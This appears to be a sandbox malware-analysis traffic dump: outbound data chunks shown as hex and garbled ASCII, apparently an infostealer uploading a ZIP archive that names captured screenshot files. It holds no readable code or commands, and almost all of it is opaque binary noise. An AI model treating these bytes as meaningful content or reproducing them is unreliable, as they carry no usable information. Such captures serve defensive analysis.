                                                                                      2023-05-22 17:51:45 UTC912OUTData Raw: 8a 58 8e 32 fd 51 68 53 06 ae 36 fd e3 46 33 ff 5b 9e 40 0d b2 e7 08 52 03 cb 6a 8e e3 a1 fa 8a 46 b8 01 24 2c 11 4e 96 44 2b 98 e0 1e af d8 8c 28 06 8e 04 d8 bd be 6e de eb 8c 13 7e b6 7d 0c aa 8e cf 50 ed 5a 7c a5 1d eb a9 3f b7 7c c3 ad 35 df 86 e2 de d2 fa fa 85 52 10 f5 e6 d7 a7 28 ff 8e 8b 77 17 94 18 8e cc e5 7f 04 fa 77 7d 0c 89 82 87 20 1f 67 bc da 3c 7a bd 31 96 38 19 a8 76 4b a6 57 2d 30 c7 df 35 89 67 c1 d3 f3 52 c5 af 9a 91 35 87 e0 90 73 8a c8 9b 03 5d d2 ae 93 5a b7 4d f8 fd 06 ad 3d c7 ed 0a b7 7a 52 d1 a8 c4 ec 4f 63 7f 74 c3 04 c6 f0 75 e2 cf 9e de 19 58 3e b7 7a 67 80 f3 72 e7 9e 83 36 fc 8a 7b dc aa d0 d6 4e 7e b3 da 54 ce 43 7f 4f 81 be 94 40 d8 84 0c c2 07 7d 46 79 56 32 71 4d ee 56 a9 7c 96 cb 20 b9 38 35 b0 4f 9e bc 5c 27 30 f9 75
                                                                                      Data Ascii: X2QhS6F3[@RjF$,ND+(n~}PZ|?|5R(ww} g<z18vKW-05gR5s]ZM=zROctuX>zgr6{N~TCO@}FyV2qMV| 85O\'0u
                                                                                      2023-05-22 17:51:45 UTC928OUTData Raw: 3c 7b b6 e2 51 15 fc 66 c3 fa ab ab 5c 4f 9a 7e a5 07 dd c9 68 69 1d ae 2c b4 c6 61 26 25 eb aa d5 51 5b c5 76 d4 c1 eb fb 27 d7 d4 63 ef b5 30 20 bf 8a 50 09 85 05 ae 46 0a 7f de 58 34 31 54 1b 89 52 4f d0 7c d7 7d ee 46 ce e7 cf 0b 6d 56 87 40 f0 f8 a3 4d cd 42 ff 3a c9 83 7b 6d 3c 6d bb 8a 4b 0d c2 95 f6 23 d5 2b 95 2b 4b fa 3b bf ea d5 6d 41 38 39 ea f9 a4 f3 56 fc a3 f6 e9 9f f7 c9 63 27 cf ad 02 2e 9d bd d5 5e c1 02 9a c5 11 fc af 08 f6 87 c0 35 2d 94 8d 9f 4e 59 13 1c a6 7d 4f 4b af fb 13 e3 8a 47 b0 83 ec f9 59 ac ef 27 ce 4e 01 ee 83 ef ea 6a f7 7e 4e 5d f1 1c 52 3e 53 94 a7 30 16 b4 51 10 33 0b d7 c8 72 a5 e5 c6 fa 69 e6 ac d7 6c dd 24 0c da be f0 1f 97 e8 e0 5c 4b ba 20 87 7e 61 6e fd 10 9c 47 b9 81 7d fe d4 90 86 4f a7 3b d6 9f b2 d7 4b de fa
                                                                                      Data Ascii: <{Qf\O~hi,a&%Q[v'c0 PFX41TRO|}FmV@MB:{m<mK#++K;mA89Vc'.^5-NY}OKGY'Nj~N]R>S0Q3ril$\K ~anG}O;K
                                                                                      2023-05-22 17:51:45 UTC943OUTData Raw: 10 20 b1 3a a7 1b 46 5b d8 e5 c3 0d 4a 0a 3d 5d e6 bf 8b 08 89 10 56 24 0e 5a 40 87 a0 8f de 00 68 ab 9a fe 4a 78 26 45 19 45 38 68 13 fe ae 3e e4 84 58 40 41 26 a3 55 15 a3 8c 60 ae dc 24 da 22 ad 54 34 aa 03 d2 04 f1 25 1e 54 12 a1 75 43 40 7d 62 f1 08 54 d9 f7 40 a6 bd a3 ca 76 07 ad 00 ba 05 08 a9 47 aa 67 2c 9e 70 45 09 af 57 40 e9 4e 7d 1c 56 58 ec 6d 41 b8 f9 a2 46 91 cf 49 98 2d 14 cd 80 3c f4 a2 fa a5 e6 c7 82 54 8f 3f 72 ba 7d df fa 2e c2 ed 8d 5e 5e bd 6a 0a 35 74 ab fd 40 fc 5a 90 22 25 4e 0a 32 59 83 21 2e 9d 2c 2a 38 7a 63 32 e5 8d 73 e0 79 6b b2 a2 d1 15 a9 74 f4 63 37 bb 12 ae 34 5a c9 58 24 06 20 0b 12 67 40 3e a3 a7 33 80 79 21 e0 76 30 57 22 99 1e 80 35 58 30 69 f3 9f af d4 80 e4 80 6c 27 d2 fb 8a b6 e2 84 b6 7c cd ee 1f 46 39 48 78 81
                                                                                      Data Ascii: :F[J=]V$Z@hJx&EE8h>X@A&U`$"T4%TuC@}bT@vGg,pEW@N}VXmAFI-<T?r}.^^j5t@Z"%N2Y!.,*8zc2syktc74ZX$ g@>3y!v0W"5X0il'|F9Hx
                                                                                      2023-05-22 17:51:45 UTC959OUTData Raw: 90 1e f9 b2 7c db b9 7c 66 aa 6f b5 8f 55 46 30 77 de cb b9 46 e3 6f e6 6b db f2 eb f7 7b 38 4b e0 22 0a 7b 1a 2f e2 cc e6 b5 9c ef 13 62 23 3b e8 6a 52 a0 72 77 ed 5f 0e 60 a6 68 8a 1e 7d ac 3f e3 f8 2b 86 29 ea ff fd 5b 53 07 84 ad af 8a 24 18 fc 27 00 5f 54 4c 09 4c 21 a4 04 83 d5 79 85 00 a4 94 61 46 28 d0 36 44 5d a4 01 11 26 95 c2 72 0d b4 09 65 5b 27 10 46 88 3e d9 fc 59 34 5a 17 1e a2 43 01 fe 46 b1 84 46 68 2b 73 62 93 d0 ca 40 02 a9 ef 04 4c 19 9b 71 13 a2 4d ea b4 22 ae ad 7e 5d b5 46 79 53 b9 40 52 59 16 ed e2 00 bc 63 83 44 fe d7 41 86 5c 04 48 0a d5 d3 91 5a f4 38 e8 22 94 0b 71 f9 aa 61 b2 18 f0 e4 63 c6 14 04 52 1d 26 e8 45 fc 25 d7 61 a4 84 1e 8c 3b 4c 9e 9d 5f 54 9f 41 2b 4d 1e be ab 47 91 62 94 20 9b e2 85 1f 0b d5 bb fe 1a d9 36 e1 b9
                                                                                      Data Ascii: ||foUF0wFok{8K"{/b#;jRrw_`h}?+)[S$'_TLL!yaF(6D]&re['F>Y4ZCFFh+sb@LqM"~]FyS@RYcDA\HZ8"qacR&E%a;L_TA+MGb 6
                                                                                      2023-05-22 17:51:45 UTC975OUTData Raw: 48 0d 58 dd e5 d9 f2 0f 71 58 cf db 24 b3 a0 10 b4 0a bf 79 8b da c6 d5 8a cf 43 c4 b4 25 0c 13 99 c5 26 f6 6c ab d0 bc 31 60 6d 8a 28 6e 04 90 25 ce 2f c7 0b ba 88 f8 08 25 95 36 89 96 89 6d 36 8e fa a3 b9 27 10 17 18 cb f0 4f cb 28 33 59 91 a9 ad 10 30 08 a6 d8 0d 2b 49 6a cf 83 c1 70 c5 60 d8 40 bf 05 cf b5 e7 24 3e 22 64 c1 3d 89 54 42 70 d7 eb 27 b0 61 4f 56 ea 09 e9 08 52 30 4f b0 2e a7 30 be 68 26 b3 2e b8 9d ad 80 4d b8 a2 79 a7 14 f4 f9 0a 94 d4 c9 9c 4f 70 71 01 3b f8 19 c0 7e cf a7 88 42 c6 95 8c cd 79 8c 32 c4 20 59 e4 64 86 29 26 91 3a e5 61 e1 e1 98 68 10 ba 4f 0a 12 93 af 33 4d e5 86 56 40 30 1e ba ef ab 8c 62 3e 35 5d 26 49 10 e2 08 7c 62 ac 46 ac 97 ac c2 2d 23 08 d2 56 65 4c 16 3c 25 4a ae f1 10 4b e9 58 c6 9a 79 13 4b 0d fa b4 3c 0c c7
                                                                                      Data Ascii: HXqX$yC%&l1`m(n%/%6m6'O(3Y0+Ijp`@$>"d=TBp'aOVR0O.0h&.MyOpq;~By2 Yd)&:ahO3MV@0b>5]&I|bF-#VeL<%JKXyK<
                                                                                      2023-05-22 17:51:45 UTC991OUTData Raw: aa 12 a5 e1 85 37 be e4 0b bc 4c 1e 4d 83 2b 9a 42 a6 f7 c6 3b 97 4c 7e 81 1b 58 65 f4 af 96 20 8c 42 ef 40 45 88 a5 30 90 b5 34 b1 84 31 3b 7f 8a 5e b2 86 9e 7e 46 ef 76 c1 4a df 1d 63 a2 07 bd 0e 9b 89 99 6e 09 cb 4e 09 85 32 17 79 0e 2b 5d c2 48 2f 22 f0 14 02 a7 27 32 40 20 70 10 54 1a 80 13 1d 28 98 7e 76 19 31 15 ad c3 4c 3f 32 16 5c c2 8c cf 10 4d a4 72 c7 21 b1 ee 4b ca ee 80 40 7d 8c 75 f7 20 f3 72 c7 2b 18 c2 8d 70 90 49 7b f1 49 4d 8f af 16 f8 84 d8 38 6f 82 64 3a 36 88 cb 1d 18 9c 19 dc 90 19 54 c6 48 c1 7a 31 a6 72 10 70 0a 70 f5 a7 28 6b b4 34 59 9e 83 0c ce 64 75 79 3e 0b bc c2 12 3d 7a 9a 1c f9 aa 10 0e 52 32 cc 2e 7f 3d 00 0a e3 43 79 e8 e2 00 a9 ed c2 db 01 95 00 f7 00 da 18 07 f1 60 f0 37 65 97 80 aa 3f 45 98 59 b0 64 f2 53 b9 96 50 3e
                                                                                      Data Ascii: 7LM+B;L~Xe B@E041;^~FvJcnN2y+]H/"'2@ pT(~v1L?2\Mr!K@}u r+pI{IM8od:6THz1rpp(k4Yduy>=zR2.=Cy`7e?EYdSP>
                                                                                      2023-05-22 17:51:45 UTC1007OUTData Raw: 61 50 54 02 20 c4 03 74 48 49 33 12 08 83 92 42 50 f6 4c 5b 6d 04 c4 65 e0 25 d1 a4 34 10 78 a1 fc 0b 32 96 bf bf a0 40 f3 58 da 10 3f 78 8c 18 16 02 ff b8 2d 9a 52 a1 d6 cc fc 8b bc 38 c7 9a 42 71 ed 7e 45 0d 31 0f b1 1b 55 c4 15 be 72 2a 84 ab 4e 5c f6 d6 af df 4f 45 a8 6e 34 e7 cd 81 30 30 e1 5f c5 71 05 fe 8f e7 78 14 0f ea af db 0f 58 97 33 5d 1e 1a 7b d7 04 7b 3f 3e e4 d8 98 45 bd cc a0 1c 15 80 e8 34 ae 51 bf f0 fd 5e 4c f3 66 36 2e 70 ea 75 a8 6a a1 b2 73 61 0e cf b3 71 cf 43 e0 a1 7c 6d ab 0b f8 8b 28 3e 11 1d f0 2b d4 81 82 04 66 ce ae 45 ff a2 bc 91 b1 6d bd fb a5 15 dc 0f dc 9b 4f 9b 56 79 00 f8 c2 29 15 06 f3 d6 ae 3c 31 57 22 a1 da 78 bd 92 96 ae db ac 4b 68 dc 4c ba d4 8a ea 31 c3 f6 4b 91 d3 81 0a db a5 82 8e 64 57 c2 4b 57 b8 cb 6c 1d ec
                                                                                      Data Ascii: aPT tHI3BPL[me%4x2@X?x-R8Bq~E1Ur*N\OEn400_qxX3]{{?>E4Q^Lf6.pujsaqC|m(>+fEmOVy)<1W"xKhL1KdWKWl
                                                                                      2023-05-22 17:51:45 UTC1023OUTData Raw: 92 e6 bf ce 13 1b c8 13 ba 6b 53 e3 c7 3c c6 a1 dd d0 df 4b 05 ba 10 fe df af 28 9b 1f df 01 98 fc d1 2b 86 e1 86 7b 1f 5d f6 06 f6 dc bb df 8b 2e 8a 3b 57 05 73 b8 5d ae 7e 5f e9 fd bd 79 da 39 71 af 29 c8 c0 5c 6c ff 4b 6f 5a 27 ff f3 fd 05 e3 c1 d1 c1 0d cd b5 56 b3 28 cf 31 72 71 b1 7c 69 41 d9 9e 82 27 1b 88 df f3 20 85 9d ce de 33 15 5f 29 af 53 a4 02 7a b2 a0 8e f1 d7 d9 4e ff f4 65 5f 00 3f b0 e5 e9 e5 7c 47 26 6b 3d 39 e2 8a 13 cb 70 01 ec 76 d7 a3 b7 a6 11 69 65 2e c9 bf 12 9d a4 39 c2 b7 ef b7 ed 2d 76 4e 7f da f1 ec 90 df dc 8f 9b 5b 9f 11 e9 ff 1e 55 4b 05 4c 26 ee 06 bf fc ba 98 25 89 7a 77 d6 51 41 6a d4 a2 fc 5c dd 83 d1 27 62 b9 75 5b 4d e3 ff 52 fc b5 f2 bb a6 54 40 e2 2b 15 58 7c b5 6f f0 6e 81 f4 45 41 e5 a1 8f d1 4a 91 e5 1d 2f e4 ad
                                                                                      Data Ascii: kS<K(+{].;Ws]~_y9q)\lKoZ'V(1rq|iA' 3_)SzNe_?|G&k=9pvie.9-vN[UKL&%zwQAj\'bu[MRT@+X|onEAJ/
                                                                                      2023-05-22 17:51:45 UTC1039OUTData Raw: 3d 8f 58 f5 6a 7b 57 42 b7 89 b9 cf 74 82 57 50 8f 51 44 7d 26 f4 96 93 12 55 4c 01 0d b6 4e 4f 11 af d7 5f fc f9 96 ea 69 57 36 a3 e8 28 e5 b2 0e 39 83 b1 9a 55 74 82 2c 08 f8 2e be 82 57 88 91 c7 32 cf 9c 9c 57 88 8c 0d a2 ad 7e 9f 86 b4 f3 86 2a 0d c2 63 fe 7d ac 67 b6 a1 5c bd 22 50 e4 ac df f2 5b d8 6f 36 26 be d3 f1 31 83 e5 c7 76 97 00 dd 41 df ca 82 8b 4f fa 47 b1 01 c2 5b be 6e f1 e7 e2 92 4b 47 db a7 bf 94 b6 59 f6 aa c3 76 74 8f 6a d2 83 5e ac f9 33 a4 73 d0 2c 9c c4 ff b2 1c 48 1d 33 bf f7 4a ae ee 48 69 aa d1 cf f2 4d 60 99 2e d7 51 d1 c6 90 ee e0 b4 ea e8 6d 19 ce 3f c8 6b d5 34 71 9a cb 5a 50 64 ed da 34 3b ad f8 a7 b7 9b 3e 44 b0 c7 f8 9a 70 09 a8 0d 3f 1d 05 97 12 e0 3f a3 50 e5 e9 f0 5e a9 a4 c0 b5 aa 7d e0 54 15 21 f9 77 1d 3f 0b 25 db
                                                                                      Data Ascii: =Xj{WBtWPQD}&ULNO_iW6(9Ut,.W2W~*c}g\"P[o6&1vAOG[nKGYvtj^3s,H3JHiM`.Qm?k4qZPd4;>Dp??P^}T!w?%
                                                                                      2023-05-22 17:51:45 UTC1055OUTData Raw: 17 31 14 4e 50 8a 18 ca 47 9a 7f b6 75 11 8f e6 83 ec eb 22 ad 1e 7f fe 0e 0d f1 2f fd 6c ea 2a 68 95 86 fe ab fb fd f3 61 9a 53 64 a2 d8 55 69 07 b7 94 04 2b c1 ef 89 9f f5 07 ac 92 32 9b 5e 25 4c 8e 5e 17 2d 90 e2 12 4c 56 b4 31 10 3a 21 91 e4 5e c2 28 bf fe 3d d3 f6 8c c3 6f 33 d9 8d af 9d c4 0c 5b d9 1e 0b b4 f1 74 4e e2 97 44 be 4e 2d 02 c4 a5 d1 48 30 77 01 ca c7 07 61 84 09 40 90 ba af 64 64 45 cf 64 24 09 c0 c2 1b 51 48 9d 48 46 08 64 56 78 69 8d d8 a2 ce a2 ce 93 87 64 b7 6c a4 55 b6 64 5a 63 5f 20 a9 db 32 32 4d e0 26 bc a8 4f ec 68 8e b8 6c 6c 6a 03 e9 1f 4b c9 48 ff a4 10 ec b4 39 1a 58 f6 18 c0 a0 ba 94 8c ea 18 c8 04 c3 cb 3e 00 9e 30 ff 37 9c bd ea 1d 48 7f b7 56 ce 59 08 9a 02 76 1a 74 3c e1 f2 90 44 5c 35 2f 3a d6 05 67 c4 57 86 58 42 99
                                                                                      Data Ascii: 1NPGu"/l*haSdUi+2^%L^-LV1:!^(=o3[tNDN-H0wa@ddEd$QHHFdVxidlUdZc_ 22M&OhlljKH9X>07HVYvt<D\5/:gWXB
                                                                                      2023-05-22 17:51:45 UTC1071OUTData Raw: 4c df dc a5 67 70 e3 23 05 cc cc 89 25 fa 15 e8 8e 9f 65 4c f4 dc 49 28 4c a4 3b a7 03 86 5c 28 04 a6 8f 8d bf 21 1a fb 16 b8 db 1d 0d fc db ab 62 63 84 41 d0 4f eb ff cb 75 96 60 a1 e7 1f c2 af f2 c2 80 b1 18 a3 2d c1 03 08 8b 53 11 18 80 28 1b 0d 52 58 b2 71 ec 50 f5 0c 67 8f 32 1c 03 7e 46 1b e0 da 85 44 2a d7 6f 74 27 ed 0e 35 aa 92 3b 9e 19 dc 89 ee 5c 28 cf e7 60 01 6c 5d a1 79 1a ad 84 ca 40 62 2d 15 b5 06 1e a1 43 7d 69 9f 97 6f 90 87 cf c3 05 01 73 80 83 25 71 c3 24 6d d9 f8 7a 20 18 a0 f7 76 da 43 32 a0 0c ae e7 88 8d e5 04 0b 54 ca 52 16 92 ef 7c 97 98 0a 43 b7 be 5f b6 60 b7 fc 88 a9 95 e1 58 04 de c7 45 fc dc f3 3d 54 0a 6c 06 5d 66 11 0f f1 37 67 c9 51 74 00 e6 a4 29 bb 51 5b 12 ed 6f ac 8b 23 c5 bb bc 99 c2 4b c8 05 9b f8 9b b4 e1 af 98 5f
                                                                                      Data Ascii: Lgp#%eLI(L;\(!bcAOu`-S(RXqPg2~FD*ot'5;\(`l]y@b-C}ios%q$mz vC2TR|C_`XE=Tl]f7gQt)Q[o#K_
                                                                                      2023-05-22 17:51:45 UTC1087OUTData Raw: 21 89 13 e7 9a d9 b6 8a e6 3e a7 9e 97 d6 b2 f5 91 c9 ec 2f 74 cd 31 fc 2e ff 1b a1 1f 83 af 78 94 8d be f9 75 59 a2 6e ba e8 79 e2 44 95 a5 af 0a 5b 80 bf e4 39 79 96 d4 09 4d 0f bd d5 83 b0 8e 8c 9c 93 fc a5 82 49 b3 ad 25 1c 07 3d be 12 e2 97 27 f4 d9 ed fd e8 46 de 1d 0c 8f a8 56 6c ce a8 98 ee bb 15 ea 19 5b 73 7f b2 19 11 e5 ab f9 81 d1 e2 2b af bc a4 d2 d9 43 67 f2 e7 ae 4d e2 a7 4e 98 3a f9 a7 e5 06 92 16 f3 c1 f7 bf 76 69 ad ef 31 de 2c 52 3d 02 d8 0c 4d 77 b7 93 8f 00 85 f0 dc be 16 b9 1f 67 6c 8e 00 d3 0b 3e 3f 85 7b ce 1d 0d fd 1f 50 4b 03 04 14 00 00 00 08 00 63 9e b6 56 a8 00 4a 69 cd 3c 01 00 a7 49 01 00 2e 00 24 00 53 63 72 65 65 6e 73 68 6f 74 73 2f 53 63 72 65 65 6e 73 68 6f 74 5f 32 32 2e 30 35 2e 32 30 32 33 2d 32 31 2e 34 31 2e 35 35
                                                                                      Data Ascii: !>/t1.xuYnyD[9yMI%='FVl[s+CgMN:vi1,R=Mwgl>?{PKcVJi<I.$Screenshots/Screenshot_22.05.2023-21.41.55
                                                                                      2023-05-22 17:51:45 UTC1103OUTData Raw: d9 fc f5 d8 4f f5 6d b7 2c de 3c 94 10 88 cd 22 54 6b 8a 1a 9f 81 5b 3f 7e a0 3a b7 94 74 35 6b ce 5c f8 51 f4 45 19 65 26 86 6d a4 78 62 99 48 24 76 0f 3d 99 bc 32 1d cb f4 1a f5 28 d0 7f f9 98 a2 d7 77 7e a3 4a 27 e8 90 2f 7c bc a1 75 fe a2 86 0e 0f ae b3 7f 61 c1 43 e2 09 2f 2a b5 24 d5 ce 5b be 31 23 ec e8 3d 93 47 c7 82 96 93 c8 3f b0 1e 5d d8 8a a9 59 d6 66 c8 99 a6 aa f5 7b f7 ec 4d 06 bb eb 74 ce 26 15 5d 1a 33 56 7c fd 72 ee 48 2b e9 49 8b 98 e1 2a b7 f1 87 5d 9b a4 bb a0 a4 8e 2d 49 f9 73 d3 fc 0f 1b 6d 01 30 da c3 06 15 bd fa a8 b0 f3 02 d7 eb 4b ec 4f b6 35 27 1a 84 f6 aa cb 84 b7 41 5d 2d 69 7b 62 f7 5b f6 2e a4 e2 e6 83 87 39 29 5e 72 eb 65 4b 2e 67 76 c4 27 1c 5b 5c 73 0e 13 ec 6c 5e c7 64 f1 26 47 62 ee 9b 9c 43 37 e3 bd 0c 03 98 55 9f e7
                                                                                      Data Ascii: Om,<"Tk[?~:t5k\QEe&mxbH$v=2(w~J'/|uaC/*$[1#=G?]Yf{Mt&]3V|rH+I*]-Ism0KO5'A]-i{b[.9)^reK.gv'[\sl^d&GbC7U
                                                                                      2023-05-22 17:51:45 UTC1119OUTData Raw: ff 23 12 85 12 6d 08 52 a7 ea b8 14 12 9d d0 22 75 cf be 02 2d 04 fe 27 51 45 e8 10 22 de 1f ab 09 5f cd 82 28 47 5c 85 e8 01 b1 c5 69 d2 2c 30 6d 88 ee e3 50 e8 a0 58 8e 61 94 dd e7 a2 ab ba 40 a2 c5 11 74 95 58 d4 25 1a 17 ac e9 09 98 60 44 2f cf e2 2b c9 44 74 9e 0d 18 9e 1d 28 9e ca 00 35 7a b5 13 24 3f ae 82 7b 90 51 ae 45 2d 27 53 7c 04 0f 35 8c 72 78 4d b4 2f ab 44 d3 43 bc 24 c9 54 84 d0 4d 8b 58 cd c1 c4 4b e4 9f 4e 5a 66 d1 5f 25 9a 2b 22 35 21 f2 8d 41 c0 b8 b8 0e 4b 46 b9 36 e6 0a de 43 1f d8 fb 61 11 fe 90 81 69 89 f8 1e b3 30 d1 30 11 fd b6 98 a0 5e 53 ba e4 75 89 05 87 46 f9 c2 c6 c2 41 71 79 84 87 2e 50 5b 15 11 52 2c ae 4f 11 1d d5 91 e5 03 a4 28 ae d1 d8 20 ef 33 a5 46 3f 32 64 5d f7 81 f3 a5 7c 60 4f 0f 54 a6 96 93 d8 0a eb d3 e5 c1 ed
                                                                                      Data Ascii: #mR"u-'QE"_(G\i,0mPXa@tX%`D/+Dt(5z$?{QE-'S|5rxM/DC$TMXKNZf_%+"5!AKF6Cai00^SuFAqy.P[R,O( 3F?2d]|`OT
                                                                                      2023-05-22 17:51:45 UTC1135OUTData Raw: 9f 56 d0 41 67 b2 2c 4a 6d d3 46 6a fd 9f 39 ef 2f b5 f5 b4 7a 4f 9e e3 8c 2b 5c b5 4d 1d 49 dc cd c7 e2 87 6f d3 1e dc ee 3d 8a 3f ec 79 1b 96 f5 e7 d5 96 08 0f c0 9a f5 b4 f7 67 64 f2 6f f6 f2 f4 ef 56 4f 59 26 d2 5a 86 55 2d 94 f9 b4 c7 4b 05 f1 6b d3 2a 90 56 68 c9 eb 1e a6 1f e4 53 18 10 99 09 fd 4d bf 53 1e 57 92 91 ec da 60 ce 06 ff 60 c1 23 db a8 8a 69 30 03 34 22 ba fb b4 68 05 53 a7 22 a0 e3 dc ba 5d d4 3c 1c 7c 4d 51 e6 3c a7 46 c5 b7 49 90 4a d8 6e 45 0b 0e 44 22 76 ca 19 eb a7 51 87 4a b1 d9 c1 56 2f 26 55 31 9d 97 30 95 fc 25 42 23 c3 49 8f 4c d5 da 5e 00 f2 0e 50 b5 62 db ba 3b 75 94 b7 51 93 b6 87 f8 1f f8 61 29 80 fb c7 e3 f4 27 c5 cb e6 d6 1d fa 11 17 fc 84 d3 19 9b f3 41 90 46 94 4e f4 0c 81 71 fc 60 2c 2a d9 d0 83 15 24 0a 9f 00 54 77
                                                                                      Data Ascii: VAg,JmFj9/zO+\MIo=?ygdoVOY&ZU-Kk*VhSMSW``#i04"hS"]<|MQ<FIJnED"vQJV/&U10%B#IL^Pb;uQa)'AFNq`,*$Tw
                                                                                      2023-05-22 17:51:45 UTC1151OUTData Raw: ed 75 d8 f6 35 ad db f8 d7 79 ed bb 57 66 5a 64 6b 25 cd d4 f1 23 3d 1f 19 5a ff 73 3b f3 29 e3 91 d1 ae 9f 76 8c f7 f8 9f 1e 8d 71 f3 a4 3f cd 36 67 8f 96 23 f4 ed f8 5e 64 bc b8 56 46 69 fd b1 59 96 8e a5 45 c1 c1 ac d2 f4 3d 3b 10 fd d2 d0 90 d9 b1 f8 54 1a 8c 30 67 c6 03 93 1a 61 02 38 7c 0e 3c 80 53 c3 3c ae 80 9a cb 8d 43 e0 bc f8 87 79 04 70 a7 cb 46 74 d8 70 0a 26 66 40 d0 08 2c 7a 30 40 d0 00 30 ff 8b 21 23 0c 4a 1a 24 80 46 03 6f 23 17 d0 b1 f2 6c 53 58 66 81 9f 20 c2 6f 40 e9 42 c1 79 0b d9 51 f4 98 05 40 1e 96 09 3c dd 63 2c c8 17 9f 9e 4d 8f 3f c8 53 fa 20 cc a5 a5 6b 00 33 a8 d1 4f 3a a0 50 1e 24 f7 c7 7a 85 16 64 15 1b 10 b1 94 80 73 e1 c9 ce 27 ab 77 c8 03 37 e8 d5 64 72 60 9d 68 5a 0f 04 86 a7 ab 46 b8 a4 07 00 cc 14 84 e5 0c 54 d2 03 9f
                                                                                      Data Ascii: u5yWfZdk%#=Zs;)vq?6g#^dVFiYE=;T0ga8|<S<CypFtp&f@,z0@0!#J$Fo#lSXf o@ByQ@<c,M?S k3O:P$zds'w7dr`hZFT
                                                                                      2023-05-22 17:51:45 UTC1167OUTData Raw: 82 0b 88 7b 84 6c 8e 10 e1 a7 a1 a9 44 ec 37 8b 3e 52 21 3b d7 38 44 4c 1e 3e 23 26 a1 be 48 43 4b c7 79 e9 32 17 37 8f a8 98 b8 c4 d5 6b d7 e5 6e c1 e4 15 14 95 e0 9a 5a b7 b5 75 74 ef e8 99 9a 99 df b7 b0 b4 b2 7e f4 d8 c9 d9 c5 d5 cd fd b9 8f af df 8b 97 af d0 61 e1 11 91 51 d1 31 b1 71 69 e9 19 98 cc ac ec 9c d7 c5 6f 4b 4a cb ca 2b de bd ff 54 57 df d0 d8 d4 fc f9 4b 57 77 4f 6f 5f ff b7 81 c1 89 c9 a9 e9 99 d9 b9 ef f3 0b eb 1b 9b 5b db 3b bb 7b fb 07 27 71 e1 81 71 fe fe fa 4f e3 a2 00 e3 3a 75 fa 34 fe 69 c2 93 b8 f0 4e b9 9c 6c 40 71 fa 0c ab 10 01 e5 0d 04 e1 3d c7 0b 6c c2 4f 89 20 37 43 53 8b 3e 12 b3 8b 20 d7 a8 4c 1e 76 92 50 73 88 4e 70 ae 9f 84 f6 23 b2 ff 59 60 cf fe 8f 22 fb 23 b0 3f e3 1a 04 48 f1 f1 c0 93 87 4f 01 40 81 f5 2b 42 ca ca
                                                                                      Data Ascii: {lD7>R!;8DL>#&HCKy27knZut~aQ1qioKJ+TWKWwOo_[;{'qqO:u4iNl@q=lO 7CS> LvPsNp#Y`"#?HO@+B
                                                                                      2023-05-22 17:51:45 UTC1183OUTData Raw: b4 54 72 6f 3a 08 75 7e c8 b5 3e e5 3c 0e b8 5b 5d e7 a1 58 ad 30 ed b8 a7 13 e1 fa 70 3f df 53 d5 de f5 a0 70 c7 e6 d4 f4 28 8d d4 b2 4f 2e 8a d0 73 8e 39 c8 26 c5 bf 71 4d 61 6d 52 fd 5c 8c c5 a1 1d a9 95 38 41 3b 7f b2 e3 e9 39 69 e1 eb 3a 92 13 f1 b5 6f f6 d0 7d 73 87 ea 87 22 f7 71 c0 56 ed db fd 51 23 c4 8b e1 d5 84 a9 a1 6b 05 74 8f 87 4d 79 0b 05 a3 27 dd 45 e2 6c 75 b7 d4 f7 94 a1 0b 99 38 60 86 10 6c 6f 7a cc e7 67 37 8f c8 52 5a 77 0a 4b dd a2 9d 57 77 82 05 2d e2 63 86 57 87 8e ae 2d 06 0d e4 e1 80 5f 37 d6 c1 b2 a9 ce ed 5d bc 99 bc 6c 6c bd 29 b0 3c b6 cc 64 d4 2e 21 74 6d ac 7c ef 51 3f e3 5b dd ee c0 5c 39 b5 ea da 43 ad db 3a ee 22 fd 59 db bd 09 b2 d6 ae ee d9 1c 59 84 85 f9 96 47 c7 1f de 17 bb d3 95 52 0d b1 d2 5e cb 7b d3 98 c4 91 37
                                                                                      Data Ascii: Tro:u~><[]X0p?Sp(O.s9&qMamR\8A;9i:o}s"qVQ#ktMy'Elu8`lozg7RZwKWw-cW-_7]ll)<d.!tm|Q?[\9C:"YYGR^{7
                                                                                      2023-05-22 17:51:45 UTC1199OUTData Raw: a9 da 13 58 aa d2 28 5f 5d 28 d8 16 68 22 c8 00 68 70 58 d7 f9 5a f6 e6 11 ec 03 07 41 d0 1b 3c e8 f1 ab f3 c5 af d8 d7 ce 21 0b 21 b3 38 c9 7c 3a b9 22 dc f7 37 74 22 c9 2a 86 ea 2e 04 45 12 3c 9c c5 c4 75 83 72 d3 63 ee 01 65 b7 29 3a f8 ee bf de 23 6b eb 5f 65 51 75 63 6c b3 c9 26 63 29 f7 a5 5b ec 29 cc 27 e2 d5 a1 ec fb 14 f1 36 c4 16 0f fa 38 29 1e 35 a0 40 98 9b 67 bc 75 5c 70 f3 3e 7b 56 84 2c c9 fb 36 82 e0 ea fd 15 0e 1d 43 d2 4b 98 91 91 cf 65 21 ed e1 6b 4f cc 8f 5f ed 9e 2e 61 3e 7a c7 0d f5 7c 27 bb 61 5c 5f 69 8a 26 ff 6a 14 b6 d1 c3 ec 1b 34 35 76 c1 fe ba 88 80 1f cd 40 99 1f 8e da dc 95 65 7c b5 66 3e bd a0 d3 72 1e 42 e8 49 d4 26 39 67 9c 01 3e cc e7 ee 38 f1 2b fc 3a 17 1f d5 94 5b 69 9e 28 31 b1 0e 25 6a a1 96 1a 52 7f bd 69 20 bc 29
                                                                                      Data Ascii: X(_](h"hpXZA<!!8|:"7t"*.E<urce):#k_eQucl&c)[)'68)5@gu\p>{V,6CKe!kO_.a>z|'a\_i&j45v@e|f>rBI&9g>8+:[i(1%jRi )
                                                                                      2023-05-22 17:51:45 UTC1215OUTData Raw: 95 2c 80 86 e6 44 5a ff 08 51 08 f0 ba 2a c4 fd 80 ca e7 45 52 f6 d3 58 47 a2 e1 9e a9 24 27 b9 58 16 98 9c 4d 9d bc 04 08 17 73 e2 49 2f ab aa 06 6a c2 6c 74 bb 04 0f 11 a1 05 6f 00 2c 8a 59 3b 5f 69 d1 bf 5a 4f a0 25 f7 08 f4 eb 55 80 4a 22 59 21 1e e4 62 28 44 b8 67 fa eb d6 12 40 c5 a9 64 49 0f fb c5 2b 70 5e e8 15 7f 2a 5d a3 b9 5a 4c 56 2e ed 53 40 f9 28 61 14 b1 fe 89 c1 b5 06 77 79 d6 2b 56 a7 22 85 f0 bf 52 3f 77 36 65 44 9c 94 d3 ef 1a b6 fa a6 e1 d9 50 eb f0 7d 20 b3 d6 f2 ca b1 62 e3 f4 b9 a3 15 ea 61 6b 33 48 e4 f8 ef e1 f1 0f d9 a3 d2 19 8e db 75 